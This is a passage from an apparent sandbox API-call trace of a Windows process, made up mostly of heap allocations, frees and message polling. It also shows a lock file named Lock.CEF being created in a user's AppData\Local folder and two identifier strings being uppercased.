hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0154.611] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0154.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0154.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0154.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0154.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0154.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0154.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0154.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0154.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0154.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0154.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0154.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0154.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0154.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0154.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0154.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0154.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0154.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0154.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0154.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0154.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0154.612] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/" (normalized: "c:\\users\\fd1hvy\\appdata\\local")) returned 0x10 [0154.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0154.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0154.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0154.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0154.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0154.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0154.612] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Lock.CEF" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\lock.cef"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4 [0154.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70a0 [0154.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0154.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0154.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0154.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0154.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0154.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0154.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0154.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0154.613] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0154.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0154.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0154.613] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0154.613] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0154.613] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0154.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0154.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0154.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0154.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0154.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0154.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0154.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0154.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0154.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0154.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0154.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0154.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0154.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0154.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0154.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0154.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0154.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0154.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0154.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0154.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0154.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0154.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0154.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0154.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0154.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0154.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0154.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0154.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0154.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0154.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0154.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0154.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0154.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0154.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0154.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0154.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0154.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0154.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0154.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0154.615] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0154.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0154.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0154.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0154.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0154.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0154.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72aa8 [0154.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0154.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0154.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0154.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0154.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0154.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0154.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0154.615] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0154.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0154.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0154.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0154.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0154.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0154.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0154.616] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0154.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0154.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0154.616] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0154.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0154.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0154.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0154.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72aa8 [0154.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0154.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0154.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0154.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0154.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0154.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a730c8 [0154.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0154.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0154.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0154.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a73128 [0154.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0154.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0154.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0154.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a715e8 [0154.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0154.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0154.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0154.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa930 [0154.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0154.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0154.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0154.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0154.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0154.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0154.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0154.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0154.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0154.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0154.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0154.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0154.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0154.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0154.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0154.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0154.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0154.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0154.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0154.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0154.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0154.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0154.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0154.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0154.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0154.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0154.617] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0154.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0154.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0154.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0154.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0154.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0154.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0154.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0154.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0154.618] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0154.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0154.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0154.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0154.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0154.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0154.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0154.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0154.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0154.618] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0154.618] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0154.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0154.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0154.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0154.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0154.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0154.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0154.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0154.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0154.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0154.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0154.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0154.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0154.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0154.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0154.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0154.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0154.619] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0154.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0154.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0154.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0154.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0154.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0154.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0154.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0154.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0154.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0154.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0154.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0154.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0154.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0154.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0154.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0154.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0154.619] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0154.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0154.619] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0154.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0154.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0154.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0154.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0154.619] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0154.619] 